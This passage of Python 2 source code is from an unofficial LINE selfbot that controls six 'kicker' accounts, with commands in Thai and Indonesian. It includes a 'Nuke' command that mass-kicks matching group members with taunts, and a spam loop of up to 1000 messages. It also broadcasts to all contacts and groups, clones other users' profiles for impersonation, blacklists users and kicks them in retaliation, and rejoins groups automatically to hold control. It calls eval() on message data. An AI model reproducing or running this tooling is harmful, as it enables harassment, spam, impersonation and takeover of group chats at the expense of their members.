cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว \nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["2ลบรัน"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["3ลบรัน"]:
gid = ki2.getGroupIdsInvited()
for i in gid:
ki2.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki2.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki2.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["4ลบรัน"]:
gid = ki3.getGroupIdsInvited()
for i in gid:
ki3.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki3.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki3.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["5ลบรัน"]:
gid = ki4.getGroupIdsInvited()
for i in gid:
ki4.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki4.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki4.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["6ลบรัน"]:
gid = ki5.getGroupIdsInvited()
for i in gid:
ki5.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki5.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki5.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["7ลบรัน"]:
gid = ki6.getGroupIdsInvited()
for i in gid:
ki6.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki6.sendText(msg.to,"ลบห้องเชิญเรียบร้อยแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
ki6.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text in ["ลบแชท","ล้างแชท"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"ลบแชทเรียบร้อย\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
#-----------------------------------------------------------
elif msg.text in ["ลบแชทบอท","ล้างแชทบอท"]:
ki.removeAllMessages(op.param2)
ki2.removeAllMessages(op.param2)
ki3.removeAllMessages(op.param2)
ki4.removeAllMessages(op.param2)
ki5.removeAllMessages(op.param2)
ki6.removeAllMessages(op.param2)
cl.sendText(msg.to,"❇️Delete Chat Bot❇️")
cl.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻\nได้ลบแชทBot 6Kicker เรียบร้อย")
elif msg.text in ["ยกเลิกเชิญ","Cancel dong","B cancel"]:
if msg.toType == 2:
group = ki.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif msg.text in ["Cancel","cancel"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ไม่มีการเชิญ\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ยกเลิกเรียบร้อย\n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif "Group cancel:" in msg.text:
try:
strnum = msg.text.replace("Group cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"ปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "เปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,strnum + "เปิดระบบกินห้องรัน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar👈")
else:
cl.sendText(msg.to,"Weird value🛡")
elif msg.text in ["เช็คกลุ่ม","Glist"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[⭐] %s \n" % (cl.getGroup(i).name + " Members : " + str(len (cl.getGroup(i).members)))
cl.sendText(msg.to, "☆รายการกลุ่ม☆\n"+ h +"จำนวนกลุ่ม " +str(len(gid)))
elif msg.text.lower() == 'เช็คidกลุ่ม':
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif "รายละเอียดกลุ่ม" == msg.text:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
elif "[Auto] " in msg.text:
msg.contentType = 13
_name = msg.text.replace("[Auto] ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "☜ʕ•ﻌ•ʔ " in msg.text:
msg.contentType = 13
_name = msg.text.replace("☜ʕ•ﻌ•ʔ ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif msg.text in ["Group cancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"บกเลิกห้องทั้งหมดแล้ว\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
else:
cl.sendText(msg.to,"By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif ("ดำ " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif "ขาว @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("ขาว @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "ดำ1:" in msg.text:
nk0 = msg.text.replace("ดำ1:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "ขาว:" in msg.text:
nk0 = msg.text.replace("ขาว:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["ดำคท"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["ขาวคท"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text.lower() == 'เช็คดำ':
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "�" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text in ["Cb","ล้างดำ"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
cl.sendText(msg.to,"Target Lock")
elif msg.text in ["Banlistall","Mcheck"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Me ban","Cekban","Mcheck mid"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Conban","ข้อมูลบัญชีดำ","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text.lower() == 'kill':
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Daftar hitam pengguna tidak memiliki")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
ki6.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
elif "Nuke" in msg.text:
if msg.toType == 2:
print "Nuke ok"
_name = msg.text.replace("Nuke","")
# One group snapshot is enough; the member list is the same from every bot account.
gs = ki.getGroup(msg.to)
start = time.time()
ki.sendText(msg.to, "Nuke Speed")
elapsed_time = time.time() - start
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "Nuke Start")
ki4.sendText(msg.to, "Nuke Proses")
ki5.sendText(msg.to," See You Bitch ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
ki6.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg,to,"Nuke Finish")
ki1.sendText(msg,to,"Nuke Succes Bos")
elif ("Bunuh " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Telan " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
ki.sendText(msg.to,"Error")
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Beb " in msg.text:
nk0 = msg.text.replace("Beb ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
cl.sendText(msg.to,"Good Bye")
elif ("Bye " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
except:
pass
elif "Cbroadcast " in msg.text:
bctxt = msg.text.replace("Cbroadcast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Gbroadcast " in msg.text:
bctxt = msg.text.replace("Gbroadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt))
elif msg.text == "เช็คอ่าน":
cl.sendText(msg.to, "เปิดระบบเช็คคนอ่าน\nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "อ่าน":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to,"======ชื่อคนอ่าน====== %s\n=====ชื่อคนอ่าน======\n%s\nเวลาอ่าน \n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to,"กรุณาสั่งเช็คอ่านและสั่งอ่านใหม่ \n By . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif "tag all" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml <= 200:
for i in range(0, 100):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, jml):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml <= 500:
for i in range(0, 100):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 200):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, min(300, jml)):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, min(400, jml)):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, jml):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "จำนวนที่ีแท็ก \n" + str(jml) + " คน \n By . ༺ πနးຫຮี่のีধ์͜͡ ༻"
cnt.to = msg.to
cl.sendMessage(cnt)
elif "มอง" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += "@Krampus\n"
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
text = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (text+"\n")
if txt[1] == "on":
if jmlh <= 1000:
for x in range(jmlh):
cl.sendText(msg.to, text)
else:
cl.sendText(msg.to, "Out Of Range!")
elif txt[1] == "off":
if jmlh <= 1000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif "[Auto Respond]" in msg.text:
cl.sendImageWithUrl(msg.to, "http://dl.profile.line.naver.jp/0hlGvN3GXvM2hLNx8goPtMP3dyPQU8GSIgJVUpCTpiPVtiA3M2clJ-C2hia11mUn04cAJ-DWljOVBj")
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx: " in msg.text:
txt = msg.text.replace("Tx: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif msg.text in ["Kembali","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Telah kembali semula")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
sendMessage(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
except Exception as e:
print e
elif msg.text in ["Name me","Men"]:
G = cl.getProfile()
X = G.displayName
cl.sendText(msg.to,X)
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text == ".11":
cl.sendText(msg.to, "มีใครอยู่ไหม…… !?")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%d-%m-%Y ⏰%H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "คนอ่าน":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═════════════════%s\n╠═════════════════\n%s╠═════════════════\n║Readig point creation:\n║ [%s]\n╚══════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "กรุณาพิมเช็คอ่านใหม่ \nBy . ༺ πနးຫຮี่のีধ์͜͡ ༻")
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled👈")
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
